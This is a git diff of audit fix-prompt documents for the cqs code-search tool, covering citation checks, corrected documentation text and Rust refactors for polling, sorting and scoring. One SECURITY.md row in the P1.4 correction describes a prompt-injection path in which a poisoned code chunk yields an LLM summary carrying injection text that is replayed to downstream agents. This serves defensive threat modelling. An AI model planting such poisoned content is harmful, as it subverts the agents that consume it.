+Current code at `src/serve/auth.rs:243-321` (both `strip_token_param` and `check_request`) matches verbatim. The two pinned tests at lines 572-600 exist with the exact `_NOT_stripped_today` / `_today_rejects` naming. `axum::body::Body` is in scope at the module level (line 35), so `Body::empty()` in the new test compiles. `AuthToken::random()` and `cookie_name_for_port` exist as cited. The `pair_key_is_token` helper handles all the case-fold + percent-decode cases the audit names. The `!pair.is_empty()` filter cleanup is consistent with the existing `p2_30_strip_token_param_handles_double_ampersand` test's permissive assertion (`==` either form). `percent-encoding` is in the lockfile transitively but not a direct dep — prompt correctly calls out the explicit add to `Cargo.toml`.
+
+### P1.4 — PRIVACY/SECURITY misstate cache key: NEEDS FIX
+
+- **Issue:** PRIVACY.md replacement claims "the `purpose` discriminator (`embedding` vs `summary`)" — but `src/cache.rs:99-104` shows `CachePurpose` is `Embedding ("embedding")` and `EmbeddingBase ("embedding_base")`. There is no `'summary'` purpose in the `embedding_cache` table; the `'summary'` purpose lives in a different table (`llm_summaries` per `src/schema.sql:182`).
+- **Issue:** SECURITY.md replacement says "the post-summary embedding is cached in `embeddings_cache.db` keyed by `(content_hash, model_fingerprint, purpose='summary')` (#1128)" — same conflation. The post-summary embedding actually goes through the `Embedding` purpose path (no separate `summary` purpose row in `embedding_cache`).
+- **Correction (PRIVACY.md:16):**
+  ```markdown
+  - `.cqs/embeddings_cache.db` — per-project embedding cache, keyed by `(content_hash, model_fingerprint, purpose)` (#1105, #1128). Skips re-embedding chunks that haven't changed across reindexes / model swaps; the `purpose` discriminator (`embedding` for the post-enrichment vector, `embedding_base` for the raw NL vector) prevents the two streams from overwriting each other when the same chunk produces both.
+  ```
+- **Correction (SECURITY.md:47):**
+  ```markdown
+  | **LLM-generated summaries** (`cqs index --llm-summaries`) | Claude is prompted with chunk content; a poisoned chunk can produce a summary that contains injection text. The summary is cached in `llm_summaries` keyed by `(content_hash, purpose)` per `src/schema.sql:178-182`; the post-summary embedding flows through the normal `embeddings_cache.db` (purpose `embedding`) and is replayed to downstream agents | Yes — cached in `llm_summaries` table + `embeddings_cache.db` |
+  ```
+
+### P1.5 — Symlink Behavior matrix: VERIFIED
+
+Current docs at `SECURITY.md:203-215` match verbatim. `enumerate_files` at `src/lib.rs:601` uses `WalkBuilder::follow_links(false)` as cited. The split-into-two-regimes replacement is accurate to actual code paths. Cross-check with `SECURITY.md:162` ("Symlinks are skipped during directory walks and archive extraction") confirmed consistent.
+
+### P1.6 — read --focus / context trust_level: NEEDS FIX
+
+- **Issue:** Prompt says "find the `FocusedReadJsonOutput { ... }` literal (around line 369-380)" — actual production literal is at `src/cli/commands/io/read.rs:408`. More importantly, there are 3 additional `FocusedReadJsonOutput { ... }` literals inside `#[cfg(test)] mod tests` at lines 447, 470, 486 (`focused_read_output_with_hints`, `focused_read_output_no_hints`, `focused_read_output_with_warnings`). Adding required `trust_level` and `injection_flags` fields to the struct without updating these 3 test sites breaks the build.
+- **Issue:** For `context.rs`, the prompt says "Apply the same pattern to `compact_to_json` and `summary_to_json` constructors" but does not show the actual constructor sites. `CompactChunkEntry` literal is at `src/cli/commands/io/context.rs:84`, `SummaryChunkEntry` literal at line 486. Both these structs *also* lack the new fields, so the audit-finding's claim that the JSON shape is consistent across all chunk-emitting commands implies these structs need the same `trust_level` + `injection_flags` additions as `FullChunkEntry`. The prompt omits the explicit struct-definition edits.
+- **Correction:** Add explicit edits to (1) the 3 test-site `FocusedReadJsonOutput` constructions, (2) the `CompactChunkEntry` struct definition + `compact_to_json` constructor at line 84, (3) the `SummaryChunkEntry` struct definition + `summary_to_json` constructor at line 486. Existing integration tests in the same file (`hp1_compact_to_json_*` etc.) will also need their literal constructions updated.
+
+### P1.7 — SECURITY auth surface backfill: VERIFIED
+
+Current SECURITY.md:17 matches verbatim. `NoAuthAcknowledgement` exported at `src/serve/mod.rs:47`, `cookie_name_for_port` at `src/serve/auth.rs:62`. The replacement accurately reflects the v1.30 hardenings (#1135 cookie scoping + #1136 ack token).
+
+### P1.8 — ROADMAP #1182 closed: VERIFIED
+
+ROADMAP.md:16 and :142 match verbatim. Recent git log confirms `a240ad08 test(watch): bulk-delta reconcile pass for #1182 acceptance — 47-file scenario (#1196)` is on main. The replacement accurately closes the doc claim.
+
+### P1.9 — embed_batch_size_for wiring: NEEDS FIX
+
+- **Issue:** Prompt's test fixture update says "pass `model_config: cqs::embedder::ModelConfig::resolve(None, None).unwrap()`". But `ModelConfig::resolve` at `src/embedder/models.rs:427` returns `Self`, not `Result<Self>` or `Option<Self>`. `.unwrap()` on a non-`Result`/`Option` will not compile.
+- **Correction:** Use `cqs::embedder::ModelConfig::resolve(None, None)` (no `.unwrap()`).
+- All other line citations verified (types.rs:147-207, parsing.rs:14-42, enrichment.rs:23 + 73-74, pipeline/mod.rs:15 + 74-94, build.rs:520-522). Test fixture site at `parsing.rs:344` does construct `ParserStageContext` directly and would need the `model_config` field added — prompt mentions this generically.
+
+### P1.10 — daemon env snapshot redaction: VERIFIED
+
+Current code at `src/cli/watch/mod.rs:525-532` matches verbatim. `CQS_LLM_API_KEY` is referenced at `src/llm/local.rs:110` as cited. The redaction list `["_API_KEY", "_TOKEN", "_PASSWORD", "_SECRET"]` covers the named threat. Test design captures the exact in-prod logic.
+
+### P1.11 — run_daemon_reconcile cap: NEEDS FIX
+
+- **Issue:** Prompt's regression test calls `setup_store_for_test(dir.path())` — but no such helper exists in `src/cli/watch/reconcile.rs`. The actual helper is `open_store(cqs_dir)` at line 170, which takes the `.cqs/` dir, not the project root.
+- **Correction:** Replace the test's setup with the existing helper pattern:
+  ```rust
+  let dir = tempfile::tempdir().unwrap();
+  let cqs_dir = dir.path().join(".cqs");
+  std::fs::create_dir_all(&cqs_dir).unwrap();
+  let store = open_store(&cqs_dir);
+  ```
+- All other citations verified: `run_daemon_reconcile` at lines 63-148, callers at `mod.rs:1055` and `mod.rs:1268`, 5 test sites at lines 190/204/225/362/450. Caller sweep complete.
+
+### P1.12 — reconcile non-monotonic mtime predicate: NEEDS FIX
+
+- **Issue:** Same `setup_store_for_test` helper does not exist (see P1.11 — actual helper is `open_store`).
+- **Issue:** Prompt claims "`filetime` is already a dev-dependency via `tempfile` interactions". Verified against `Cargo.toml:289-297` and `Cargo.lock` — `filetime` is NOT in `[dev-dependencies]` and NOT in the lockfile. Any `use filetime::...` in the new test will fail to compile.
+- **Correction (helper):** Use `open_store(&dir.path().join(".cqs"))` per existing tests, after `std::fs::create_dir_all` on the `.cqs` dir.
+- **Correction (filetime):** Add `filetime = "0.2"` to `[dev-dependencies]` in `Cargo.toml`. `filetime::FileTime::from_system_time` and `filetime::set_file_mtime` are stable across 0.2.x.
+- Current code at `src/cli/watch/reconcile.rs:108-127` matches verbatim. Predicate change `disk > stored` → `disk != stored` correctly addresses the non-monotonic-mtime case the audit identifies.
+
+---
+
+**Tally:** 7 VERIFIED, 5 NEEDS FIX (P1.4, P1.6, P1.9, P1.11, P1.12).
+
+**Most concerning issue:** **P1.4 — PRIVACY/SECURITY incorrect cache-key claim.** The prompt itself is a "fix the lying doc" P1, and its replacement text introduces a *new* lie (claiming `purpose='summary'` rows exist in `embedding_cache.db`). Per the skill's "Lying-doc P1s" rule, the doc must stop lying — applying P1.4 as written would replace one factual error with another. This is the highest-impact verification miss because the audit's whole point of categorizing P1.4 as P1 is that PRIVACY.md is the canonical user-facing surface for "what does cqs store"; a second wrong claim there would be discovered by the next reader as another audit finding.
+
+**Secondary concern:** **P1.11 + P1.12 use a fictional `setup_store_for_test` helper.** Both prompts will fail to compile their regression tests. Easy mechanical fix once flagged but worth catching before the implementation pass dispatches.
+
+# v1.30.1 Audit P2 Fix Prompts
+
+Generated 2026-04-28. Total P2 findings: 32. Distinct fix prompts after grouping: 22.
+
+Grouped bundles:
+- **P2-bundle-wait-fresh** absorbs RB-9, EH-V1.30.1-2, OB-V1.30.1-8, TC-HAP-1.30.1-5, TC-ADV-1.30.1-4 (5 findings → 1 prompt). All five share the `wait_for_fresh` poll loop refactor.
+- **P2-bundle-reconcile-stat** absorbs EH-V1.30.1-7, TC-ADV-1.30.1-5, TC-ADV-1.30.1-6 (3 findings → 1 prompt). Same `metadata()` arm at `reconcile.rs:116-127`.
+- **P2-bundle-watch-status-machine** absorbs OB-V1.30.1-3, TC-HAP-1.30.1-8 (2 findings → 1 prompt). Both about `WatchSnapshot::compute` + transition emission.
+- **P2-bundle-eval-gate** absorbs OB-V1.30.1-6, TC-HAP-1.30.1-4, TC-HAP-1.30.1-7 (3 findings → 1 prompt). Same `require_fresh_gate` function.
+- **P2-bundle-rb1-rb6** absorbs RB-1, RB-6 (2 findings → 1 prompt). Both about path-string handling in enumerate/reconcile.
+
+Remaining 17 single-issue prompts cover the rest.
+
+---
+
+## P2: P2-bundle-wait-fresh — `wait_for_fresh` papercut bundle (RB-9 + EH-V1.30.1-2 + OB-V1.30.1-8 + TC-HAP-1.30.1-5 + TC-ADV-1.30.1-4)
+
+**Files:** `src/daemon_translate.rs:625-679`, `src/cli/commands/eval/mod.rs:246-264`, plus tests at `src/daemon_translate.rs:1208-1376`
+**Effort:** ~90 minutes
+**Why:** `wait_for_fresh` is on the hot path of #1182 and bundles five independent papercuts: stringly-typed errors collapse transport/parse failures into `NoDaemon` (wrong advice), `daemon_status` warns at info-level on every connect failure during the 250 ms poll loop (up to 2400 lines/600 s), no exponential backoff, no test for Stale→Fresh transition, no test for daemon-dies-mid-poll. Single refactor pass touches all five surfaces.
+
+### Current code
+
+```rust
+// src/daemon_translate.rs:623-678
+/// #1182 — Layer 4: outcome of [`wait_for_fresh`].
+#[cfg(unix)]
+#[derive(Debug, Clone)]
+pub enum FreshnessWait {
+    Fresh(crate::watch_status::WatchSnapshot),
+    Timeout(crate::watch_status::WatchSnapshot),
+    NoDaemon(String),
+}
+
+#[cfg(unix)]
+pub fn wait_for_fresh(cqs_dir: &std::path::Path, wait_secs: u64) -> FreshnessWait {
+    let _span = tracing::info_span!("wait_for_fresh", wait_secs).entered();
+    let deadline = std::time::Instant::now() + std::time::Duration::from_secs(wait_secs);
+    let poll_interval = std::time::Duration::from_millis(250);
+
+    loop {
+        match daemon_status(cqs_dir) {
+            Ok(snap) => {
+                if snap.is_fresh() {
+                    return FreshnessWait::Fresh(snap);
+                }
+                if std::time::Instant::now() >= deadline {
+                    return FreshnessWait::Timeout(snap);
+                }
+                std::thread::sleep(poll_interval);
+            }
+            Err(msg) => return FreshnessWait::NoDaemon(msg),
+        }
     }
 }
 ```
 
-### Notes
-
-- Production code is correct; this is regression protection.
-
----
-
-## P2.45 — `bfs_expand` HashMap seed order (already fixed — pin with test)
-
-**Finding:** P2.45 in audit-triage.md
-**Files:** `src/gather.rs:317-330` — fix already on disk (sorts seeds by `(score desc, name asc)` before enqueue).
-
-### Regression-pin test
-
 ```rust
-#[cfg(test)]
-mod bfs_seed_order_tests {
-    use super::*;
-
-    #[test]
-    fn bfs_expand_is_deterministic_under_seed_shuffling() {
-        // Build name_scores with two entries scored equally and one above.
-        // Run bfs_expand 100 times; assert the resulting name_scores is
-        // identical across runs.
-    }
-
-    #[test]
-    fn bfs_expand_processes_higher_scoring_seed_first() {
-        // Two seeds: ("foo", 0.9) and ("bar", 0.5).
-        // With max_expanded_nodes=1 (cap before second seed expands),
-        // assert "foo"'s neighbors got into name_scores, not "bar"'s.
-    }
-}
-```
-
-### Notes
-
-- Production code is correct; this pins it.
-
----
-
-## P2.46 — `contrastive_neighbors` top-K tie-break (already fixed — pin with test)
-
-**Finding:** P2.46 in audit-triage.md
-**Files:** `src/llm/summary.rs:263-282` — fix already on disk (`.then(a.0.cmp(&b.0))` cascade on all three sorts).
-
-### Regression-pin test
-
-```rust
-#[cfg(test)]
-mod contrastive_neighbor_tests {
-    use super::*;
-
-    #[test]
-    fn contrastive_neighbors_top_k_is_deterministic_under_ties() {
-        // Build a similarity matrix where row 0 has multiple entries scoring
-        // exactly the same. Run contrastive_neighbors 50 times; assert the
-        // returned neighbor list is identical every time.
-    }
-}
-```
-
-### Notes
-
-- Production code is correct; this pins it for the cache-cost-sensitive contrastive summary path (~$0.38/run Haiku regenerates if cache misses).
-
----
-# P2 Part B Fix Prompts (P2.47–P2.92)
-
-## P2.47 — reranker compute_scores unchecked batch_size*stride
-
-**Finding:** P2.47 in audit-triage.md
-**Files:** `src/reranker.rs:368-415`
-**Why:** Listed as algorithm bug; verifying source shows the negative-dim guard AND the `checked_mul` guard already landed.
-
-### Notes
-
-Audit description claimed: "shape[1] = -1 → wraps to usize::MAX" and "batch_size * stride unchecked." Reading `src/reranker.rs:385-405` shows both guards are already present:
-
-```rust
-let stride = if shape.len() == 2 {
-    let dim = shape[1];
-    if dim < 0 {
-        return Err(RerankerError::Inference(format!(
-            "Model returned negative output dim {dim} (dynamic axis not bound?)"
-        )));
-    }
-    dim as usize
-} else { 1 };
-if stride == 0 { ... }
-let expected_len = batch_size.checked_mul(stride).ok_or_else(|| {
-    RerankerError::Inference(format!(
-        "Reranker output too large: batch_size={batch_size} * stride={stride} overflows usize"
-    ))
+// src/daemon_translate.rs:438-441 — connect-stage warn fires every poll
+let mut stream = UnixStream::connect(&sock_path).map_err(|e| {
+    tracing::warn!(stage = "connect", error = %e, "daemon_status failed");
+    format!("connect to {} failed: {e}", sock_path.display())
 })?;
 ```
 
-**Action:** No-op — finding is already fixed by AC-V1.29-6 comment block. Verifier should mark P2.47 as resolved without code change. Optionally add a regression test that constructs a fake `(shape=[batch,−1])` path through a mock and asserts the negative-dim error is returned (the panic-on-overflow path is covered by `checked_mul`).
+### Replacement / approach
 
----
+1. **Distinguish daemon errors at the `daemon_status` layer.** Introduce a `DaemonStatusError` enum with `SocketMissing`, `Transport(String)`, `BadResponse(String)` variants. Update `daemon_status`, `daemon_ping`, `daemon_reconcile` signatures to return `Result<T, DaemonStatusError>` (this fold-in collapses API-V1.30.1-5 too — see separate prompt; keep that finding noted). Demote the connect-failure `tracing::warn!` inside `daemon_status` to `tracing::debug!` so the `wait_for_fresh` poll loop doesn't spam the journal at info level (OB-V1.30.1-8). The caller is responsible for the final-decision warn.
 
-## P2.48 — doc_comments select_uncached tertiary tie-break
-
-**Finding:** P2.48 in audit-triage.md
-**Files:** `src/llm/doc_comments.rs:222-242`
-**Why:** Verify whether the chunk-id tie-break is missing.
-
-### Notes
-
-Reading `src/llm/doc_comments.rs:231-239`:
+2. **Extend `FreshnessWait`** to mirror the new error shape:
 
 ```rust
-uncached.sort_by(|a, b| {
-    let a_no_doc = a.doc.as_ref().is_none_or(|d| d.trim().is_empty());
-    let b_no_doc = b.doc.as_ref().is_none_or(|d| d.trim().is_empty());
-    // no-doc before thin-doc
-    b_no_doc
-        .cmp(&a_no_doc)
-        .then_with(|| b.content.len().cmp(&a.content.len()))
-        .then_with(|| a.id.cmp(&b.id))
-});
-```
-
-The tertiary `a.id.cmp(&b.id)` already exists (annotated AC-V1.29-7). **Action:** No-op — already fixed. Verifier should mark P2.48 resolved.
-
----
-
-## P2.49 — map_hunks_to_functions HashMap iteration order
-
-**Finding:** P2.49 in audit-triage.md
-**Files:** `src/impact/diff.rs:38-106` (map_hunks_to_functions), `src/impact/diff.rs:154-168` (cap)
-**Why:** `HashMap<&Path, Vec<…>>` is iterated to produce a Vec — non-deterministic when two files exist; downstream `take(cap)` then drops different functions per run.
-
-### Current code
-
-`src/impact/diff.rs:46-65`:
-
-```rust
-    // Group hunks by file
-    let mut by_file: HashMap<&Path, Vec<&crate::diff_parse::DiffHunk>> = HashMap::new();
-    for hunk in hunks {
-        by_file.entry(&hunk.file).or_default().push(hunk);
-    }
-
-    // PF-1: Batch-fetch all file chunks in a single query instead of N queries
-    let normalized_paths: Vec<String> = by_file
-        .keys()
-        .map(|f| normalize_slashes(&f.to_string_lossy()))
-        .collect();
-    let origin_refs: Vec<&str> = normalized_paths.iter().map(|s| s.as_str()).collect();
-    let chunks_by_origin = match store.get_chunks_by_origins_batch(&origin_refs) {
-        Ok(m) => m,
-        Err(e) => {
-            tracing::warn!(error = %e, "Failed to batch-fetch chunks for diff hunks");
-            return functions;
-        }
-    };
-
-    for (file, file_hunks) in &by_file {
-```
-
-### Replacement
-
-After building `functions` via map (or after returning from `map_hunks_to_functions`), sort deterministically. Easiest: change `by_file` to `BTreeMap` so iteration is by path:
-
-```rust
-use std::collections::BTreeMap;
-// ...
-let mut by_file: BTreeMap<&Path, Vec<&crate::diff_parse::DiffHunk>> = BTreeMap::new();
-for hunk in hunks {
-    by_file.entry(&hunk.file).or_default().push(hunk);
+#[cfg(unix)]
+#[derive(Debug, Clone)]
+pub enum FreshnessWait {
+    Fresh(crate::watch_status::WatchSnapshot),
+    Timeout(crate::watch_status::WatchSnapshot),
+    /// Socket file missing — the daemon never started.
+    NoDaemon(String),
+    /// Connect/read/write/timeout — daemon is gone or hung.
+    Transport(String),
+    /// Envelope/JSON/parse error — daemon answered but garbled.
+    BadResponse(String),
 }
 ```
 
-And, before returning, sort `functions` for full determinism:
+3. **Refactor the poll loop with bounded poll count, exponential backoff, and terminal tracing** (RB-9 + RB-2 + OB-V1.30.1-4 fold-in):
 
 ```rust
-functions.sort_by(|a, b| {
-    a.file.cmp(&b.file)
-        .then(a.line_start.cmp(&b.line_start))
-        .then(a.name.cmp(&b.name))
-});
-functions
-```
+#[cfg(unix)]
+pub fn wait_for_fresh(cqs_dir: &std::path::Path, wait_secs: u64) -> FreshnessWait {
+    let _span = tracing::info_span!("wait_for_fresh", wait_secs).entered();
+    let start = std::time::Instant::now();
+    // Defensive cap: caller should pass a sane budget but a `pub fn` must
+    // not panic on `Instant + Duration::from_secs(u64::MAX)` (RB-2).
+    let bounded_secs = wait_secs.min(86_400);
+    let deadline = start + std::time::Duration::from_secs(bounded_secs);
 
-### Notes
-
-The `seen: HashSet<String>` dedup uses `chunk.name`, but only first-seen wins — under HashMap order this is also non-deterministic. The final sort eliminates both effects. Add a regression test seeding 3 files with overlapping function names and asserting `map_hunks_to_functions` is identical across 100 calls.
-
----
-
-## P2.50 — search_reference threshold/weight ordering
-
-**Finding:** P2.50 in audit-triage.md
-**Files:** `src/reference.rs:231-285`
-**Why:** Underlying search caps at `limit` against unweighted scores AND filters at unweighted threshold; post-weight retain double-filters. Multi-ref ranking under-samples corpus when weight<1.
-
-### Current code
-
-`src/reference.rs:242-258`:
-
-```rust
-    let mut results = ref_idx.store.search_filtered_with_index(
-        query_embedding,
-        filter,
-        limit,
-        threshold,
-        ref_idx.index.as_deref(),
-    )?;
-    if apply_weight {
-        for r in &mut results {
-            r.score *= ref_idx.weight;
-        }
-        // Re-filter after weight: results that passed raw threshold may fall
-        // below after weighting (consistent with name_only path)
-        results.retain(|r| r.score >= threshold);
-    }
-    Ok(results)
-```
-
-### Replacement
-
-```rust
-    let raw_threshold = if apply_weight && ref_idx.weight > 0.0 {
-        threshold / ref_idx.weight
-    } else {
-        threshold
-    };
-    let raw_limit = if apply_weight {
-        // 2× over-fetch leaves headroom for weighted retain step
-        limit.saturating_mul(2).max(limit)
-    } else {
-        limit
-    };
-    let mut results = ref_idx.store.search_filtered_with_index(
-        query_embedding,
-        filter,
-        raw_limit,
-        raw_threshold,
-        ref_idx.index.as_deref(),
-    )?;
-    if apply_weight {
-        for r in &mut results {
-            r.score *= ref_idx.weight;
-        }
-        results.retain(|r| r.score >= threshold);
-        results.sort_by(|a, b| {
-            b.score
-                .total_cmp(&a.score)
-                .then(a.chunk.id.cmp(&b.chunk.id))
-        });
-        results.truncate(limit);
-    }
-    Ok(results)
-```
-
-Mirror the same shape in `search_reference_by_name` at `src/reference.rs:265-285` — its `retain(|r| r.score * weight >= threshold)` already applies the right boundary, but it doesn't over-fetch from `search_by_name`. Pass a relaxed `limit * 2` to `store.search_by_name`, retain+weight+sort+truncate at the end.
-
-### Notes
-
-`SearchResult.chunk.id` (or whatever the canonical id field is) is the deterministic tertiary key. Confirm field path before applying.
-
----
-
-## P2.51 — find_type_overlap chunk_info HashMap iteration
-
-**Finding:** P2.51 in audit-triage.md
-**Files:** `src/related.rs:131-157`
-**Why:** Three sources of HashMap iteration leak into `cqs related` output: (a) `chunk_info` `or_insert` retains first arrival, (b) sort lacks tie-break on equal counts, (c) earlier `type_names` collected from HashSet.
-
-### Current code
-
-`src/related.rs:128-157`:
-
-```rust
-    let mut type_counts: HashMap<String, u32> = HashMap::new();
-    let mut chunk_info: HashMap<String, (PathBuf, u32)> = HashMap::new();
-
-    for chunks in results.values() {
-        for chunk in chunks {
-            if chunk.name == target_name {
-                continue;
-            }
-            if !matches!(
-                chunk.chunk_type,
-                crate::language::ChunkType::Function | crate::language::ChunkType::Method
-            ) {
-                continue;
-            }
-            *type_counts.entry(chunk.name.clone()).or_insert(0) += 1;
-            chunk_info
-                .entry(chunk.name.clone())
-                .or_insert((chunk.file.clone(), chunk.line_start));
-        }
-    }
-
-    tracing::debug!(
-        candidates = type_counts.len(),
-        "Type overlap candidates found"
+    let mut poll_interval = std::time::Duration::from_millis(
+        crate::limits::freshness_poll_ms_initial(),
     );
+    let max_interval = std::time::Duration::from_secs(2);
 
-    // Sort by overlap count descending
-    let mut sorted: Vec<(String, u32)> = type_counts.into_iter().collect();
-    sorted.sort_by_key(|e| std::cmp::Reverse(e.1));
-    sorted.truncate(limit);
-```
-
-### Replacement
-
-```rust
-    let mut type_counts: HashMap<String, u32> = HashMap::new();
-    let mut chunk_info: HashMap<String, (PathBuf, u32)> = HashMap::new();
-
-    // Iterate `results` in deterministic key order so `or_insert` first-wins
-    // is reproducible across runs.
-    let mut keys: Vec<&String> = results.keys().collect();
-    keys.sort();
-    for key in keys {
-        let chunks = &results[key];
-        for chunk in chunks {
-            if chunk.name == target_name {
-                continue;
-            }
-            if !matches!(
-                chunk.chunk_type,
-                crate::language::ChunkType::Function | crate::language::ChunkType::Method
-            ) {
-                continue;
-            }
-            *type_counts.entry(chunk.name.clone()).or_insert(0) += 1;
-            // Pick min (file, line) so two identical-named functions across files
-            // produce a deterministic representative regardless of insertion order.
-            let entry = (chunk.file.clone(), chunk.line_start);
-            chunk_info
-                .entry(chunk.name.clone())
-                .and_modify(|cur| {
-                    if entry < *cur {
-                        *cur = entry.clone();
-                    }
-                })
-                .or_insert(entry);
-        }
-    }
-
-    tracing::debug!(
-        candidates = type_counts.len(),
-        "Type overlap candidates found"
-    );
-
-    // Sort by count desc, then name asc for stable tie-break.
-    let mut sorted: Vec<(String, u32)> = type_counts.into_iter().collect();
-    sorted.sort_by(|a, b| b.1.cmp(&a.1).then(a.0.cmp(&b.0)));
-    sorted.truncate(limit);
-```
-
-Also, locate the `type_names` collection earlier (~`src/related.rs:59-65`):
-
-```rust
-let mut type_names: Vec<&str> = type_set.iter().copied().collect();
-type_names.sort();
-type_names.dedup();
-```
-
-### Notes
-
-Verify the `type_names` site shape before edit — finding cites lines 59-65 but the actual variable name and source set need to be confirmed via Read.
-
----
-
-## P2.52 — CAGRA search_with_filter under-fills when included<k
-
-**Finding:** P2.52 in audit-triage.md
-**Files:** `src/cagra.rs:520-598`
-**Why:** When filter retains fewer than `k` candidates, CAGRA is asked for `k` slots and silently returns under-filled results; when `k > itopk_max` AND `included < k`, CAGRA errors and `search_impl` returns empty without retry at feasible `k`.
-
-### Current code
-
-`src/cagra.rs:540-597`:
-
-```rust
-        // Build bitset on host: evaluate predicate for each vector
-        let n = self.id_map.len();
-        let n_words = n.div_ceil(32);
-        let mut bitset = vec![0u32; n_words];
-        let mut included = 0usize;
-        for (i, id) in self.id_map.iter().enumerate() {
-            if filter(id) {
-                bitset[i / 32] |= 1u32 << (i % 32);
-                included += 1;
-            }
-        }
-
-        // If everything passes the filter, use unfiltered search (faster)
-        if included == n {
-            return CagraIndex::search(self, query, k);
-        }
-
-        // If nothing passes, no results
-        if included == 0 {
-            return Vec::new();
-        }
-        // ...
-        self.search_impl(&gpu, query, k, Some(&bitset_device))
-```
-
-### Replacement
-
-```rust
-        // Cap effective k at the count of vectors that actually pass the
-        // filter — asking CAGRA for more slots than feasible silently
-        // under-fills (or, when k > itopk_max, errors out and zeroes the
-        // result). Both modes hide a "no candidates" answer behind the same
-        // empty Vec a real "no matches" would produce.
-        let effective_k = k.min(included);
-        if effective_k < k {
-            tracing::debug!(
-                requested = k,
-                effective = effective_k,
-                included,
-                "CAGRA filtered search: capping k at included to avoid under-fill"
+    loop {
+        // RB-9 / AC-V1.30.1-6: deadline-first so a slow daemon timeout
+        // can't push us over budget.
+        if std::time::Instant::now() >= deadline {
+            tracing::info!(
+                elapsed_ms = start.elapsed().as_millis() as u64,
+                "wait_for_fresh: deadline reached",
             );
+            return FreshnessWait::Timeout(crate::watch_status::WatchSnapshot::unknown());
         }
-        // ...
-        self.search_impl(&gpu, query, effective_k, Some(&bitset_device))
-```
 
-### Notes
-
-Caller (`Store::search_filtered_with_index`) does not currently propagate a `truncated` flag for under-fill; the audit recommends a follow-on but mark out of scope here. The minimal fix is the `effective_k` cap. Add a regression test that builds a 12-vector index, calls `search_with_filter` with `k=20`, asserts result length == 12 and no error logged.
-
----
-
-## P2.53 — Hybrid SPLADE alpha=0 unbounded score cliff
-
-**Finding:** P2.53 in audit-triage.md
-**Files:** `src/search/query.rs:649-672`
-**Why:** `alpha == 0` branch emits `1.0 + s` (in `[1.0, 2.0]`) while dense path emits `[-1, 1]` cosine; any positive sparse signal beats every dense match.
-
-### Current code
-
-`src/search/query.rs:649-672`:
-
-```rust
-        let mut fused: Vec<crate::index::IndexResult> = all_ids
-            .iter()
-            .map(|id| {
-                let d = dense_scores.get(id).copied().unwrap_or(0.0);
-                let s = sparse_scores.get(id).copied().unwrap_or(0.0);
-                let score = if alpha <= 0.0 {
-                    // Pure re-rank mode: SPLADE score for chunks it found,
-                    // cosine score (demoted) for chunks it didn't.
-                    // This preserves cosine ordering for SPLADE-unknown chunks
-                    // while letting SPLADE override when it has signal.
-                    if s > 0.0 {
-                        1.0 + s
-                    } else {
-                        d
-                    }
-                } else {
-                    alpha * d + (1.0 - alpha) * s
-                };
-                crate::index::IndexResult {
-                    id: id.to_string(),
-                    score,
+        match daemon_status(cqs_dir) {
+            Ok(snap) => {
+                if snap.is_fresh() {
+                    tracing::info!(
+                        elapsed_ms = start.elapsed().as_millis() as u64,
+                        modified_files = snap.modified_files,
+                        "wait_for_fresh: index reached Fresh",
+                    );
+                    return FreshnessWait::Fresh(snap);
                 }
-            })
-            .collect();
-```
-
-### Replacement
-
-```rust
-        let mut fused: Vec<crate::index::IndexResult> = all_ids
-            .iter()
-            .map(|id| {
-                let d = dense_scores.get(id).copied().unwrap_or(0.0);
-                let s = sparse_scores.get(id).copied().unwrap_or(0.0);
-                let score = if alpha <= 0.0 {
-                    // Pure re-rank mode: SPLADE-found chunks get a small
-                    // additive boost over their dense cosine, so SPLADE
-                    // signal nudges ranking without dominating it. The
-                    // boost stays within the dense [-1, 1] band — no
-                    // magic "1.0 + s" cliff that drowns strong cosine
-                    // matches under any positive sparse signal.
-                    let boost = s * 0.1;
-                    d + boost
-                } else {
-                    alpha * d + (1.0 - alpha) * s
-                };
-                crate::index::IndexResult {
-                    id: id.to_string(),
-                    score,
+                if std::time::Instant::now() >= deadline {
+                    tracing::info!(
+                        elapsed_ms = start.elapsed().as_millis() as u64,
+                        modified_files = snap.modified_files,
+                        rebuild_in_flight = snap.rebuild_in_flight,
+                        "wait_for_fresh: timeout — index still stale",
+                    );
+                    return FreshnessWait::Timeout(snap);
                 }
-            })
-            .collect();
-```
-
-### Notes
-
-Add a regression test: dense pool `[(A, 0.95)]`, sparse pool `[(B, 0.001 normalized)]`, alpha=0 → expect `A` first, not `B@1.001`. Eval drift expected — re-run dev-set R@5 after this change.
-
----
-
-## P2.54 — apply_scoring_pipeline name_boost sign-flip
-
-**Finding:** P2.54 in audit-triage.md
-**Files:** `src/search/scoring/candidate.rs:283-298`
-**Why:** Out-of-range `name_boost` (CLI accepts arbitrary finite f32) makes `(1 - nb)` negative; `.max(0.0)` then nukes good matches. Even in-range, raw embedding can be negative, contaminating the blend.
-
-### Current code
-
-`src/search/scoring/candidate.rs:282-298`:
-
-```rust
-    let base_score = if let Some(matcher) = ctx.name_matcher {
-        let n = name.unwrap_or("");
-        let name_score = matcher.score(n);
-        (1.0 - ctx.filter.name_boost) * embedding_score + ctx.filter.name_boost * name_score
-    } else {
-        embedding_score
-    };
-
-    if let Some(matcher) = ctx.glob_matcher {
-        if !matcher.is_match(file_part) {
-            return None;
+                std::thread::sleep(poll_interval);
+                poll_interval = (poll_interval * 2).min(max_interval);
+            }
+            Err(DaemonStatusError::SocketMissing(msg)) => {
+                tracing::info!(error = %msg, "wait_for_fresh: daemon socket missing");
+                return FreshnessWait::NoDaemon(msg);
+            }
+            Err(DaemonStatusError::Transport(msg)) => {
+                tracing::info!(error = %msg, "wait_for_fresh: transport failure");
+                return FreshnessWait::Transport(msg);
+            }
+            Err(DaemonStatusError::BadResponse(msg)) => {
+                tracing::info!(error = %msg, "wait_for_fresh: malformed daemon response");
+                return FreshnessWait::BadResponse(msg);
+            }
         }
     }
-
-    let chunk_name = name.unwrap_or("");
-    let mut score = base_score.max(0.0) * ctx.note_index.boost(file_part, chunk_name);
-```
-
-### Replacement
-
-```rust
-    // Clamp inputs to [0, 1] before linear interpolation so the blend is
-    // always between two same-range numbers and never sign-flips. This
-    // closes the failure mode where an out-of-range `name_boost` produces
-    // `(1 - nb) < 0`, multiplies a strong embedding match by a negative
-    // weight, and the downstream `.max(0.0)` then deletes it silently.
-    let embedding_score = embedding_score.clamp(0.0, 1.0);
-    let nb = ctx.filter.name_boost.clamp(0.0, 1.0);
-    let base_score = if let Some(matcher) = ctx.name_matcher {
-        let n = name.unwrap_or("");
-        let name_score = matcher.score(n);
